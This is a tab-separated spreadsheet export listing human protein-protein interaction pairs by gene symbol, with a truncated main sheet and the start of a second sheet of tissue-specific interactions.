NCOA4	AR
NCOA6	AR
NLRP10	AR
NR0B2	AR
RALA	ARF1
ITGA4	ARF3
ATF2	ARF4
CLN5	ARF4
RCHY1	ARF4
AP1B1	ARF5
AP3B1	ARF5
SLC2A4	ARF5
ACLY	ARF6
AIMP1	ARF6
ARRB2	ARF6
ASAP1	ARF6
ASAP2	ARF6
ATP6V0C	ARF6
ATP6V1C1	ARF6
EIF3G	ARF6
EIF4G1	ARF6
EIF6	ARF6
EPPK1	ARF6
EXOC5	ARF6
GANAB	ARF6
GART	ARF6
GBF1	ARF6
HDLBP	ARF6
MAT2A	ARF6
MEPCE	ARF6
MICALL1	ARF6
MSH2	ARF6
MTHFD1	ARF6
MUSK	ARF6
PSMD8	ARF6
QTRT1	ARF6
RAB11FIP3	ARF6
RAB11FIP4	ARF6
RAB11FIP5	ARF6
RAB3GAP2	ARF6
SF3A1	ARF6
LRRK2	ARFGAP1
MED27	ARFGAP1
PRKACB	ARFGAP1
RAB23	ARFGAP1
RASIP1	ARFGAP1
REEP5	ARFGAP1
TMED2	ARFGAP1
GABRB2	ARFGEF2
GABRB3	ARFGEF2
ITCH	ARFGEF2
MYCBP	ARFGEF2
NUP88	ARFGEF2
NUP98	ARFGEF2
PAF1	ARFGEF2
PDE3A	ARFGEF2
PNPLA2	ARFGEF2
PRKAR1A	ARFGEF2
PRKAR2A	ARFGEF2
PRKAR2B	ARFGEF2
PRPF40A	ARFGEF2
TNFRSF1A	ARFGEF2
UBC	ARFGEF2
VCP	ARFGEF2
ATP6V1C1	ARFIP1
HIST1H4A	ARFIP1
PSMG3	ARFIP1
TBC1D15	ARFIP1
ARF6	ARFIP2
ARFIP2	ARFIP2
ARL1	ARFIP2
SNX1	ARFIP2
SNX5	ARFIP2
SOCS2	ARFIP2
SMAD4	ARFRP1
ARG2	ARG1
ESR1	ARG1
NOS1	ARG1
RAD21	ARG1
ARGLU1	ARGLU1
CHERP	ARGLU1
PRMT5	ARGLU1
SF3A2	ARGLU1
SRPK1	ARGLU1
SRPK2	ARGLU1
STK4	ARGLU1
UBC	ARGLU1
ZCCHC10	ARGLU1
EPB41L1	ARHGAP1
ESR1	ARHGAP1
HMGCR	ARHGAP1
KIF1B	ARHGAP1
PTPN11	ARHGAP1
RASA1	ARHGAP1
RHOA	ARHGAP1
RHOC	ARHGAP1
RAC1	ARHGAP17
SH3GLB1	ARHGAP17
SLC9A3R1	ARHGAP17
LYN	ARHGAP19
CTNNA1	ARHGAP21
EEF1D	ARHGAP21
RHOA	ARHGAP21
SFN	ARHGAP21
YWHAZ	ARHGAP21
HNRNPA1	ARHGAP23
MEPCE	ARHGAP23
RPAP1	ARHGAP23
UBC	ARHGAP23
PTK2	ARHGAP26
RHOA	ARHGAP26
AKT1	ARHGAP29
GAB1	ARHGAP32
GRB2	ARHGAP32
GRIN2B	ARHGAP32
MEGF10	ARHGAP32
NF2	ARHGAP32
NPHP1	ARHGAP32
FASLG	ARHGAP4
MAP3K1	ARHGAP4
NRAS	ARHGAP4
HN1	ARHGAP44
RND2	ARHGAP5
SH3GL1	ARHGAP8
FASLG	ARHGAP9
MAPK1	ARHGAP9
MAPK14	ARHGAP9
RBPMS	ARHGAP9
SMAD9	ARHGAP9
UBC	ARHGAP9
ACTL6A	ARHGDIA
ARHGDIA	ARHGDIA
HAAO	ARHGDIA
HNRNPA3	ARHGDIA
HNRNPAB	ARHGDIA
NGFR	ARHGDIA
PLEKHA5	ARHGEF9
UBC	ARHGEF9
ADNP	ARID1A
BAZ1B	ARID1A
CARM1	ARID1A
CHD7	ARID1A
DPF2	ARID1A
KLF1	ARID1A
SIRT7	ARID1A
SMARCC1	ARID1A
BCL7B	ARID2
DSP	ARID3A
PML	ARID3A
SP100	ARID3A
CDK1	ARID4A
SIN3B	ARID4A
BRMS1	ARID4B
CTNNB1	ARID4B
ETS1	ARID4B
HDAC1	ARID4B
UBE2L6	ARIH1
APEX1	ARIH2
BCL6	ARNT2
SIM2	ARNT2
CSNK2B	ARNTL
EP300	ARNTL
HIF1A	ARNTL
KAT2B	ARNTL
NPAS2	ARNTL
NPAS4	ARNTL
RARA	ARNTL
RXRA	ARNTL
BTF3L4	ARPC1B
CALR	ARPC1B
DR1	ARPC1B
PAK1	ARPC1B
SRPK2	ARPC1B
SUMO1	ARPC1B
SCYL2	ARRB1
SDC3	ARRB1
SF3B2	ARRB1
SREBF2	ARRB1
SRRM2	ARRB1
STAM	ARRB1
TUBA4A	ARRB1
TUBB	ARRB1
TUBB2A	ARRB1
XRCC5	ARRB1
ZRANB2	ARRB1
ZYX	ARRB1
ACTC1	ARRB2
ADRB2	ARRB2
ALYREF	ARRB2
AP3B1	ARRB2
BAI1	ARRB2
DCD	ARRB2
DDX5	ARRB2
EEF1A1	ARRB2
EPB41L3	ARRB2
LBR	ARRB2
LHCGR	ARRB2
PPP2R1A	ARRB2
RPL12	ARRB2
RPL14	ARRB2
RPL18	ARRB2
RPL21	ARRB2
RPL22	ARRB2
SNRPD1	ARRB2
SPIN1	ARRB2
SPIN3	ARRB2
SRC	ARRB2
TUBA4A	ARRB2
TUBB2A	ARRB2
TUBB4B	ARRB2
TWISTNB	ARRB2
ARSA	ARSA
COQ6	ARSE
NDN	ARSE
TMEM259	ARSE
OLA1	ASCC2
PCBD2	ASCC2
PIK3CD	ASCC2
HIST1H3G	ASF1A
HIST1H4A	ASF1A
HTATIP2	ASF1A
CTNNB1	ASH2L
ESR1	ASH2L
HCFC1	ASH2L
KDM6B	ASH2L
MEN1	ASH2L
SETD1B	ASH2L
GDI1	ASL
GINS4	ASL
NCDN	ASL
QARS	ASL
ASMTL	ASMTL
WDR4	ASMTL
ASNA1	ASNA1
EIF6	ASNA1
RUVBL2	ASNA1
SEC61A1	ASNA1
RPS6KA1	ASPM
SMYD2	ASPM
ALPP	ASPSCR1
DCAF11	ASPSCR1
NPLOC4	ASPSCR1
PHAX	ASPSCR1
UBXN6	ASPSCR1
VCP	ASPSCR1
AKTIP	ASS1
ASCC2	ASS1
ASS1	ASS1
MLH1	ASS1
MT2A	ASS1
AKT1	ASXL1
AR	ASXL1
KRT7	ATF2
STIP1	ATF2
UQCRC1	ATF2
UQCRC2	ATF2
VDAC1	ATF2
ATF2	ATF3
ATF3	ATF3
SS18L1	ATF3
CREB1	ATF6
CREB3L3	ATF6
DDC	ATF6
NFYA	ATF6
COL4A2	ATF7IP
CREB1	ATF7IP
CSPG4	ATF7IP
DMTF1	ATF7IP
DNM2	ATF7IP
EPG5	ATF7IP
ERCC3	ATF7IP
GTF2F1	ATF7IP
LAMA4	ATF7IP
LAMC1	ATF7IP
LUC7L2	ATF7IP
MACF1	ATF7IP
MBD1	ATF7IP
MED4	ATF7IP
POLR2C	ATF7IP
POLR2G	ATF7IP
PRSS8	ATF7IP
RPL8	ATF7IP
SPTBN1	ATF7IP
SREBF2	ATF7IP
SP1	ATF7IP2
EPB41L5	ATG12
HNRNPUL1	ATG12
POP7	ATG12
RB1CC1	ATG12
SF3B1	ATG12
SNRPB2	ATG12
TGM3	ATG12
GABARAP	ATG13
EXOC1	ATG14
ABL1	ATM
AP2B1	ATM
ATF2	ATM
BRCA1	ATM
CDKN2C	ATM
DCLRE1A	ATM
E2F1	ATM
MYEF2	ATXN1
UNK	ATXN1
VSTM2L	ATXN1
BSG	ATXN10
MAGEA6	ATXN10
MAGED1	ATXN10
MRPS16	ATXN10
PHB2	ATXN10
PTP4A3	ATXN10
TXLNG	AZI2
UBC	AZI2
ABCC2	AZIN1
HLA-G	B2M
MR1	B2M
PCOLCE	B2M
B3GAT3	B3GAT3
C1GALT1C1	B3GNT2
GOLM1	B3GNT4
MPP3	B3GNTL1
UBC	B3GNTL1
B4GALNT1	B4GALNT1
B4GALT1	B4GALT1
CDK11A	B4GALT1
LALBA	B4GALT1
TFRC	B4GALT1
EXOSC10	B9D1
LIG4	B9D1
UBC	B9D1
INVS	B9D2
TTC30B	B9D2
ATXN1	BAALC
SLC7A11	BAAT
FAM175A	BABAM1
FAM175B	BABAM1
FAM210A	BABAM1
GMPS	BABAM1
LRRC47	BABAM1
PLK1	BABAM1
PYCRL	BABAM1
SFXN4	BABAM1
SLC25A11	BABAM1
SLC25A13	BABAM1
UBXN1	BABAM1
UGGT2	BABAM1
UIMC1	BABAM1
USP7	BABAM1
VPS4A	BABAM1
VPS4B	BABAM1
PALB2	BACH1
ARRB1	BACH2
ATF7	BACH2
BATF3	BACH2
BCL6	BACH2
COPS6	BACH2
DDIT3	BACH2
MAFF	BACH2
MAFK	BACH2
NFE2L1	BACH2
RAF1	BAD
BCL2	BAG1
CBL	BAG1
CD44	BAG1
CFTR	BAG1
EFTUD1	BAG1
ESR1	BAG1
FUBP1	BAG1
GRPEL1	BAG1
HDAC3	BAG1
HSPA1A	BAG1
MAPT	BAG1
MET	BAG1
NCOR1	BAG1
NCOR2	BAG1
PDGFRB	BAG1
PSMD6	BAG2
PTP4A3	BAG2
RELA	BAG2
UBC	BAG2
CRKL	BAG3
CRYAB	BAG3
CSTB	BAG3
DAZAP2	BAG3
DBR1	BAG3
DNAJB3	BAG3
IKBKG	BAG3
INIP	BAG3
MACROD1	BAG3
MAPRE1	BAG3
MED1	BAG3
PSMA2	BAG3
PSMC3	BAG3
PSMD3	BAG3
PSMD8	BAG3
PSME2	BAG3
PTRF	BAG3
RAB1B	BAG3
RAB4A	BAG3
RAB7A	BAG3
RANBP2	BAG3
RPS12	BAG3
RPS2	BAG3
RPSA	BAG3
RUVBL2	BAG3
S100A14	BAG3
S100A8	BAG3
SF3B4	BAG3
URB2	BAG3
USF1	BAG3
VDAC1	BAG3
OTUD4	BAG5
SNCA	BAG5
SOX2	BAG5
STUB1	BAG5
UIMC1	BAG5
AIFM1	BAG6
C1QA	BAG6
CD93	BAG6
CDKN1A	BAG6
CHN2	BAG6
CIAO1	BAG6
CLU	BAG6
CSNK2B	BAG6
CTCFL	BAG6
CTSB	BAG6
DERL2	BAG6
DNAJB11	BAG6
DPT	BAG6
EFEMP2	BAG6
NDUFA6	BAG6
PIN1	BAG6
PLA2G2A	BAG6
PLK1	BAG6
PPAP2C	BAG6
PPP4C	BAG6
VAMP2	BAG6
VCP	BAG6
WRAP73	BAG6
BEGAIN	BAHD1
CBX3	BAHD1
DVL2	BAHD1
HDAC1	BAHD1
LZTS2	BAHD1
MEGF10	BAHD1
PRKAR1A	BAHD1
BAIAP2	BAIAP2
BRD4	BAIAP2
KANK1	BAIAP2
PAK1	BAIAP2
RAC1	BAIAP2
PRKAB2	BAIAP2L1
TERF2	BAIAP2L1
TOMM7	BAK1
PML	BANP
SP2	BANP
TERF2IP	BANP
TNXB	BANP
TP53	BANP
TRAF2	BANP
BAP1	BAP1
CBX3	BAP1
AURKB	BARD1
BARD1	BARD1
DCC	BARD1
DHX57	BARD1
ERCC6L	BARD1
GTF3C1	BARD1
HIST2H2AB	BARD1
LRIF1	BARD1
LRRC41	BARD1
MFAP1	BARD1
MT2A	BARD1
NOM1	BARD1
PCNA	BARD1
PIAS4	BARD1
PNN	BARD1
SLFN11	BARD1
CREB1	BARX2
SRF	BARX2
UBC	BARX2
RIPK3	BASP1
TRNT1	BASP1
BATF3	BATF3
PGR	BATF3
BAD	BAX
BAG3	BAX
BAK1	BAX
BAX	BAX
BCL2	BAX
PARK7	BAX
PSMC3	BAX
SH3GLB1	BAX
TOMM22	BAX
TOMM40	BAX
VCP	BAX
BAZ1B	BAZ1A
SMARCA5	BAZ1A
ALB	BBC3
BNC1	BBC3
MCL1	BBC3
ALDOB	BBS1
FRZB	BBS10
HDAC6	BBS10
BBS1	BBS12
BBS4	BBS12
MKKS	BBS12
TCP1	BBS12
ALDOB	BBS2
BBS1	BBS2
BBS12	BBS2
EPAS1	BBS2
EXOC7	BBS2
FHOD1	BBS2
FLOT1	BBS2
HSCB	BBS2
UBC	BBS2
EIF3A	BBS4
KRT18	BBS7
BBS4	BBS9
BBS5	BBS9
BBS7	BBS9
UBE2I	BCAM
ADAMTS4	BCAN
FBLN2	BCAN
MMP10	BCAN
CBL	BCAR1
CRKL	BCAR1
CSPG4	BCAR1
HCK	BCAR1
LYN	BCAR1
PTPRA	BCAR1
PTPRF	BCAR1
PTPRH	BCAR1
PXN	BCAR1
RAPGEF1	BCAR1
SFN	BCAR1
SRC	BCAR1
SRCIN1	BCAR1
IARS	BCAR3
ACIN1	BCAS2
BCAS2	BCAS2
CDC5L	BCAS2
CSNK2A2	BCAS2
EFTUD2	BCAS2
EIF4A3	BCAS2
RBM39	BCAS2
SF3A2	BCAS2
SF3B14	BCAS2
SF3B4	BCAS2
SNRNP200	BCAS2
SNRPD1	BCAS2
SRRM2	BCAS2
U2AF1	BCAS2
U2AF2	BCAS2
UBC	BCAS2
PRMT6	BCAT1
PUS1	BCAT1
SMAD5	BCAT1
SNF8	BCAT1
CHORDC1	BCCIP
FAM46A	BCCIP
FTO	BCCIP
GNL3	BCCIP
GNS	BCCIP
RAD51	BCCIP
RPL23	BCCIP
SMS	BCCIP
BCL11A	BCL11A
PIAS3	BCL11A
NR2F1	BCL11B
NR2F2	BCL11B
RBBP4	BCL11B
RBBP7	BCL11B
SP1	BCL11B
SUV39H1	BCL11B
TAL1	BCL11B
BCL2	BCL2
BCL2L14	BCL2
CRYAB	BCL2
DYNLL1	BCL2
IRS2	BCL2
ITM2B	BCL2
ITPR1	BCL2
NAF1	BCL2
HAT1	BCL2A1
ACTB	BCL2L1
AKT1	BCL2L1
BCL2L1	BCL2L1
BCL2L11	BCL2L1
BECN1	BCL2L1
FBP1	BCL2L1
FKBP8	BCL2L1
VDAC1	BCL2L1
BAK1	BCL2L2
BAX	BCL2L2
BCL2L11	BCL2L2
BCL2L2	BCL2L2
BID	BCL2L2
COPS5	BCL3
EP300	BCL3
ESR1	BCL3
FOS	BCL3
KAT5	BCL3
RCOR1	BCL3
RUVBL1	BCL3
RUVBL2	BCL3
SHC1	BCL3
TBL1XR1	BCL3
NCOR1	BCL6
ZBTB7A	BCL6
BANF1	BCL7C
BCL7C	BCL7C
DPF2	BCL7C
SMARCC1	BCL7C
TCF4	BCL9
ARRB1	BCLAF1
ARRB2	BCLAF1
BAG3	BCLAF1
BARD1	BCLAF1
CSNK2A1	BCLAF1
RNPS1	BCLAF1
SLC25A4	BCLAF1
SUMO2	BCLAF1
UBC	BCLAF1
VCP	BCLAF1
BCL6	BCOR
CPNE2	BCOR
CPNE4	BCOR
HDAC4	BCOR
HSPA4	BCOR
MLLT1	BCOR
NACC1	BCOR
PCGF3	BCOR
RING1	BCOR
RNF2	BCOR
RYBP	BCOR
ZBTB7A	BCOR
PCGF3	BCORL1
APBA3	BCR
CBL	BCR
COPB1	BCR
CRKL	BCR
CSNK2A2	BCR
DLG1	BCR
ERCC3	BCR
GABRR1	BCR
GIPC1	BCR
GRB2	BCR
GRK5	BCR
HCK	BCR
HNF1A	BCR
WDR48	BCR
NOS3	BDNF
CSNK2A1	BDP1
S100A8	BECN1
BEGAIN	BEGAIN
DEF6	BEGAIN
DLG4	BEGAIN
NDC80	BEGAIN
QSOX1	BEGAIN
RBL1	BEGAIN
RIBC2	BEGAIN
TRIM27	BEGAIN
UBC	BEGAIN
USP2	BEGAIN
ZFP64	BEGAIN
ZNF250	BEGAIN
ZNF417	BEGAIN
APP	BEND2
ATXN1	BEND2
BARD1	BEND3
CEBPB	BEND3
HDAC1	BEND3
EMD	BEND7
LYAR	BEND7
NAP1L3	BEND7
USO1	BET1
TNF	BGN
BHLHA15	BHLHA15
MYOD1	BHLHA15
TCF3	BHLHA15
IPO5	BHLHB9
BHLHE41	BHLHE41
CEBPB	BHLHE41
CSNK2A1	BHLHE41
CSNK2A2	BHLHE41
HDAC1	BHLHE41
HIF1A	BHLHE41
MYOD1	BHLHE41
NONO	BHLHE41
RORA	BHLHE41
WDR5	BHLHE41
BAK1	BID
BAX	BID
BID	BID
BNC1	BID
CAV1	BID
CRNKL1	BID
CSNK1A1	BID
FADD	BID
RBM48	BID
BMX	BIN1
CLIP1	BIN1
CLTC	BIN1
HYOU1	BIN1
MYC	BIN1
PDE6G	BIN1
RBM12	BIN1
SOS2	BIN1
SYN1	BIN1
ZBTB3	BIN1
BIN1	BIN2
UBC	BIN2
RAF1	BIRC2
RIPK4	BIRC2
RNF31	BIRC2
ATR	BRCA1
BACH1	BRCA1
BAP1	BRCA1
BARD1	BRCA1
BLM	BRCA1
BRCA1	BRCA1
BRCC3	BRCA1
BRIP1	BRCA1
CASP9	BRCA1
CCNB1	BRCA1
CCNE1	BRCA1
CDK8	BRCA1
CDK9	BRCA1
CDKN2D	BRCA1
CHEK1	BRCA1
CHEK2	BRCA1
CLSPN	BRCA1
CNRIP1	BRCA1
COMMD1	BRCA1
COPE	BRCA1
CREB1	BRCA1
CRYZL1	BRCA1
CSNK2B	BRCA1
ERCC6	BRCA1
ERO1LB	BRCA1
ESR1	BRCA1
ETV5	BRCA1
FAM175A	BRCA1
FANCD2	BRCA1
FHL2	BRCA1
FLII	BRCA1
FTSJ2	BRCA1
GATA3	BRCA1
GGN	BRCA1
GNB2L1	BRCA1
GPN3	BRCA1
GTF2F1	BRCA1
GTF2I	BRCA1
GTF3C4	BRCA1
HDAC1	BRCA1
HDAC2	BRCA1
HERC2	BRCA1
HIBADH	BRCA1
HIST1H4A	BRCA1
HIST2H2AC	BRCA1
HIST2H3A	BRCA1
HMMR	BRCA1
HSPA14	BRCA1
JAK1	BRCA1
KAT2A	BRCA1
KPNA2	BRCA1
KPNA6	BRCA1
LDB2	BRCA1
LDHC	BRCA1
LMO4	BRCA1
RBBP8	BRCA1
RPL31	BRCA1
RWDD4	BRCA1
SPATA4	BRCA1
STRN	BRCA1
SUMO3	BRCA1
SUPT6H	BRCA1
TARS	BRCA1
TATDN2	BRCA1
TCTEX1D2	BRCA1
USP7	BRE
TNFRSF14	BTLA
UBC	BTN2A1
TFF1	BTN3A1
UBC	BTN3A2
ARL8B	BTN3A3
BTG2	BTRC
BTRC	BTRC
CCND1	BTRC
FGD1	BTRC
FGD3	BTRC
GLI3	BTRC
GNAI2	C5AR1
OLIG1	CCNDBP1
TCF3	CCNDBP1
THAP10	CCNDBP1
AR	CCNE1
HIST1H1A	CCNE1
HIST1H1B	CCNE1
RBL2	CCNE1
NRIP2	CCNG2
GANAB	CCNH
RADIL	CCNH
RARB	CCNH
BARD1	CCNT1
BRD4	CCNT1
CCNT1	CCNT1
MDFIC	CCNT1
MED26	CCNT1
MEPCE	CCNT1
PMS1	CCNT1
POLR2A	CCNT1
PURA	CCNT1
RPS9	CCNT1
SKP2	CCNT1
SNW1	CCNT1
SOX2	CCNT1
SUPT5H	CCNT1
TAF1	CCNT1
TAF7	CCNT1
TAT	CCNT1
PKN1	CCNT2
CDK14	CCNY
ACTR3	CCP110
CAND1	CCP110
CEP290	CCP110
PNMA1	CCP110
USP20	CCP110
NCK1	CCR10
CCL16	CCR2
TPST1	CCR2
ILK	CCT7
ITGA4	CCT7
KAT5	CCT7
MED31	CCT7
NKX3-1	CCT7
NOS2	CCT7
PDCD5	CCT7
PDCL3	CCT7
TBK1	CCT7
TCP1	CCT7
TRIM28	CCT7
VCP	CCT7
WDR82	CCT7
YWHAZ	CCT7
ITGA4	CCT8
FYCO1	CCZ1
SH3GL3	CD101
ARFGAP3	CD14
CSNK2B	CD163
MYH9	CD163
EWSR1	CD177
LYN	CD19
LGALS3BP	CD209
HP	CD22
INPP5D	CD22
LYN	CD22
PTPN6	CD22
PVRL2	CD226
CD86	CD28
UBC	CD28
KIAA0196	CD2AP
CSNK2A1	CD2BP2
DCD	CD2BP2
EFTUD2	CD2BP2
EP400	CD2BP2
EWSR1	CD2BP2
FSBP	CD2BP2
GINS3	CD2BP2
GINS4	CD2BP2
IBTK	CD2BP2
KHK	CD2BP2
PRPSAP1	CD2BP2
UBQLN4	CD2BP2
CAND1	CD36
CD9	CD36
CHRD	CD36
ITGA6	CD36
ITGB1	CD36
ITGB3	CD36
LCK	CD38
PECAM1	CD38
AMFR	CD3D
CD3E	CD3D
DERL1	CD3D
ERLIN2	CD3D
KCNA3	CD3D
NR3C1	CD3D
EPS8L1	CD3E
LCK	CD3E
TOP2B	CD3E
CD3E	CD3EAP
GTF3C1	CD3EAP
NBN	CD3EAP
BTRC	CD4
CD2	CD4
CD38	CD4
CD4	CD4
CD44	CD4
CD5	CD4
CXCL12	CD4
CXCR4	CD4
DDX3X	CD4
EIF3B	CD4
EIF3C	CD4
EIF3D	CD4
EIF3I	CD4
EIF4A2	CD4
ENO1	CD4
HLA-DQA2	CD4
HLA-DQB1	CD4
HNRNPA1	CD4
HNRNPA2B1	CD4
HNRNPD	CD4
HNRNPH1	CD4
HSP90AB1	CD4
HSPA8	CD4
HSPD1	CD4
IL16	CD4
INPPL1	CD4
KCNAB2	CD4
KPNB1	CD4
LAT	CD4
MAPK14	CD4
MME	CD4
MYL12A	CD4
NCL	CD4
NPM1	CD4
NR3C1	CD4
PHB	CD4
RPL18	CD4
SPG21	CD4
SSRP1	CD4
STUB1	CD4
TFRC	CD4
UNC119	CD4
VCP	CD4
VDAC1	CD4
VDAC2	CD4
VDAC3	CD4
VIM	CD4
BAG3	CD40
MS4A1	CD40
OGT	CD40
OTUD7B	CD40
PIK3CA	CD40
POLR2H	CD40
PSMD1	CD40
TDP2	CD40
TRAF1	CD40
TRAF2	CD40
TRAF3	CD40
ATF2	CD44
CD44	CD44
CD9	CD44
COL14A1	CD44
CSK	CD44
EP300	CD44
FLOT2	CD44
IQGAP1	CD44
SLC3A2	CD44
TSPAN4	CD46
BNIP3	CD47
EPB42	CD47
EEF1D	CD48
IL18RAP	CD48
LCK	CD48
CAMK2D	CD5
CBL	CD5
CD2	CD5
CD27	CD5
CD6	CD5
CD79A	CD5
CD79B	CD5
CSNK2A1	CD5
LCK	CD5
PRKCA	CD5
PRKCG	CD5
PTPN6	CD5
CD2	CD53
CD9	CD53
GGT1	CD53
IL2	CD53
IL4	CD53
PRKCA	CD53
SRPK2	CD53
ATP6V1E1	CD55
CD55	CD55
GNAI3	CD55
GPLD1	CD55
MAN2A1	CD55
MPV17	CD55
MRPL4	CD55
NDUFB7	CD55
NDUFS7	CD55
PTCD3	CD55
PTRH2	CD55
S100A10	CD55
SLC2A1	CD55
SYNJ2BP	CD55
C9	CD59
HTT	CD59
AKT1	CD81
ALYREF	CD81
ANP32B	CD81
ATP5O	CD81
CCT4	CD81
CD81	CD81
CD9	CD81
DDX5	CD81
HIST1H2BJ	CD81
NAMPT	CD81
NUDT21	CD81
PDIA6	CD81
RNF128	CD81
ITGA4	CD82
LGALS3BP	CD82
NUP88	CD82
CD80	CD86
ECE2	CD86
PARP1	CD86
LCK	CD8A
LNX2	CD8A
CD247	CD8B
LCK	CD8B
ST3GAL4	CD8B
LGALS3BP	CD9
ARHGAP15	CD93
C1QA	CD93
FAM46A	CD93
CDK1	CDC25B
KRT35	CDC25B
UBC	CDC25B
YWHAE	CDC25B
YWHAH	CDC25B
YWHAQ	CDC25B
YWHAZ	CDC25B
ANAPC1	CDC26
ANAPC13	CDC26
ANAPC2	CDC26
BUB1B	CDC26
CCNB1	CDC26
CDC20	CDC26
MAD2L1	CDC26
PTTG1	CDC26
CTNNB1	CDC27
CUEDC2	CDC27
DCPS	CDC27
HSF2	CDC27
MAD1L1	CDC27
MAD2L1	CDC27
MAD2L1BP	CDC27
PPP5C	CDC27
TTK	CDC27
UBC	CDC27
UBE2D1	CDC27
BTRC	CDC34
CCNE1	CDC34
ARHGAP8	CDC42
ARHGDIA	CDC42
ARHGDIG	CDC42
ARHGEF11	CDC42
ARRB2	CDC42
CDC42	CDC42
CDC42BPA	CDC42
CDC42BPB	CDC42
CPN1	CDC42
CSN2	CDC42
DOCK7	CDC42
EEF1G	CDC42
EIF2AK2	CDC42
EPRS	CDC42
FICD	CDC42
FMNL2	CDC42
FNBP1	CDC42
FNTA	CDC42
KIAA2026	CDC42
KIN	CDC42
KTN1	CDC42
LARS	CDC42
LCK	CDC42
LGALS1	CDC42
LRIF1	CDC42
LRRK2	CDC42
MAP3K10	CDC42
MAP3K11	CDC42
MAP3K4	CDC42
MARK4	CDC42
MCM3AP	CDC42
METAP2	CDC42
MUC12	CDC42
MYO6	CDC42
NOSTRIN	CDC42
RPL22	CDC42
WAS	CDC42
WASL	CDC42
WIPF1	CDC42
CDC42BPB	CDC42BPA
MYL12A	CDC42BPA
MYO18A	CDC42BPA
PPP1R12A	CDC42BPA
RHOQ	CDC42BPA
TAF1	CDC42BPA
TJP1	CDC42BPB
CDC42BPG	CDC42BPG
RHOQ	CDC42BPG
TBK1	CDC42BPG
FHL3	CDC42EP1
RBPMS	CDC42EP1
RHOQ	CDC42EP1
UMPS	CDC42EP3
CDC37	CDK11B
PAXIP1	CDK12
PRPF40A	CDK12
RBM39	CDK12
SRRM2	CDK12
SUMO2	CDK12
TCEB3	CDK12
TRIM24	CDK12
UBC	CDK12
VPS51	CDK12
YWHAZ	CDK16
CDK17	CDK17
YWHAQ	CDK18
YWHAZ	CDK18
FKBP15	CDK19
MED26	CDK19
CCT6A	CDK2
CCT7	CDK2
CCT8	CDK2
MDH2	CDK2
MFAP1	CDK2
MGMT	CDK2
MIF	CDK2
MNAT1	CDK2
MNDA	CDK2
MSH2	CDK2
MSN	CDK2
MTHFD1	CDK2
MYBL2	CDK2
MYCN	CDK2
MYH10	CDK2
MYH8	CDK2
MYH9	CDK2
MYL12B	CDK2
MYL6	CDK2
MYOD1	CDK2
MYOF	CDK2
NAA25	CDK2
NACA2	CDK2
NFYB	CDK2
NFYC	CDK2
NHP2L1	CDK2
PABPC1	CDK2
PAFAH1B1	CDK2
PAFAH1B2	CDK2
PAICS	CDK2
PARP1	CDK2
PCNA	CDK2
PGRMC1	CDK2
PHLDA3	CDK2
PIN1	CDK2
PKM	CDK2
PML	CDK2
PPIA	CDK2
PPIB	CDK2
PPP1CA	CDK2
PPP1CC	CDK2
PPP2CA	CDK2
PRC1	CDK2
PRDX1	CDK2
PRDX2	CDK2
PRDX3	CDK2
PRDX6	CDK2
PRKAR1A	CDK2
PRKDC	CDK2
PRMT1	CDK2
PRSS3	CDK2
PSAT1	CDK2
PSMA5	CDK2
PSMA6	CDK2
PSMB6	CDK2
PSMC6	CDK2
PSMD11	CDK2
PSMD2	CDK2
PSMD3	CDK2
PSMD8	CDK2
RB1	CDK2
RBL1	CDK2
RBL2	CDK2
RBM4	CDK2
REL	CDK2
RHOC	CDK2
RPL18	CDK2
RPL19	CDK2
RPL22	CDK2
RPL26	CDK2
RPL27	CDK2
RPL27A	CDK2
RPL28	CDK2
RPL29	CDK2
[truncated: 20,069 more rows]

## Sheet: tissue specific interactions
CDKN1A	A1BG
NGF	A2M
DPP9	AARS
EEF2K	AARS
GARS	AARS
CPD	AATF
CDK9	ACACA
CIAO1	ACACA
CSNK2A1	ACACA
CSNK2A2	ACACA
GSK3B	ACACA
MYLK	ACACA
NUP50	ACACA
COMT	ACE
GAPDH	ACOT7
SHCBP1	ACOT9
H2AFZ	ACTL6A
ING2	ACTL6A
ACTC1	ACTN4
ACTN2	ACTN4
ARPC5L	ACTR3B
CHN1	ACVR1
SMURF1	ACVR1B
NPM1	ACY1
DAD1	ADRB2
DDI1	ADRM1
PSMC3	ADRM1
PPME1	AGFG1
RIPK3	AIFM1
QARS	AIMP1
SPRR2E	AKAP12
DMXL2	AKTIP
KRT18	ALK
PHF8	ANAPC7
RAD18	ANKRD32
PPP6R1	ANKRD52
UBC	ANKRD52
LZTR1	ANKRD53
EGFR	ANKS1B
CHAF1A	ANP32A
KPNA1	ANP32A
KPNA5	ANP32A
MEPCE	ANP32A
NSFL1C	ANP32A
RAD23B	ANP32B
SNX2	ANP32E
VPS35	ANP32E
SFN	ANPEP
TM4SF1	ANPEP
HDAC2	ANTXR1
UBC	ANTXR1
COL4A2	ANTXR2
COL4A4	ANTXR2
LRP6	ANTXR2
SMAD2	ANTXR2
UBC	ANTXR2
APBB1	ANXA1
ATF2	ANXA1
MGMT	ANXA1
NFKBIA	ANXA1
TRPM7	ANXA1
USP25	ANXA1
XRCC6	ANXA1
BAG3	ANXA10
EDC3	ANXA10
RPS21	ANXA11
KIFC3	ANXA13
NEDD4	ANXA13
CTSB	ANXA2
CUL2	ANXA2
DNAJC8	ANXA2
DYSF	ANXA2
EIF1B	ANXA2
GH1	ANXA2
GJA1	ANXA2
ITGA4	ANXA2
LGALS13	ANXA2
MAP3K4	ANXA2
MGMT	ANXA2
PAK2	ANXA2
PLA1A	ANXA2
PPM1B	ANXA2
PPP2R1A	ANXA2
ANGPT2	ANXA7
ANXA4	ANXA7
CHGB	ANXA7
MED31	ANXA7
MPPED1	ANXA7
VAV1	AOC3
ATR	AP1B1
GAK	AP1M1
GRIN2B	AP1M1
SNAP29	AP2A1
SYT7	AP2A1
AP2A2	AP2A2
EPS15	AP2A2
GRK5	AP2A2
HTT	AP2A2
ITGA4	AP2S1
PAK7	AP2S1
SF3B1	APBB1
TFCP2	APBB1
ASAP2	APC
BUB3	APC
COPS5	APC
CSNK2B	APC
RANBP9	APC
RBM4B	APC
RPA2	APC
STRN	APC
CDC26	APC2
MAPRE3	APC2
C1QA	APCS
C4BPA	APCS
GRB2	APCS
HES1	APCS
CTTN	APEH
GARS	APEH
H1FX	APEH
HIST1H1C	APEH
HSPA4L	APEH
IPO7	APEH
IST1	APEH
KARS	APEH
LAMP2	APEH
NMI	APEH
SHBG	APEH
PCNA	APEX2
PDE12	APEX2
GTF3C4	API5
NT5C2	API5
NUBP1	API5
SNCA	APLP1
TMSB4X	APLP1
ADIPOR1	APLP2
AKT1	APLP2
APLP1	APLP2
APLP2	APLP2
CETP	APOA1
CFHR1	APOA1
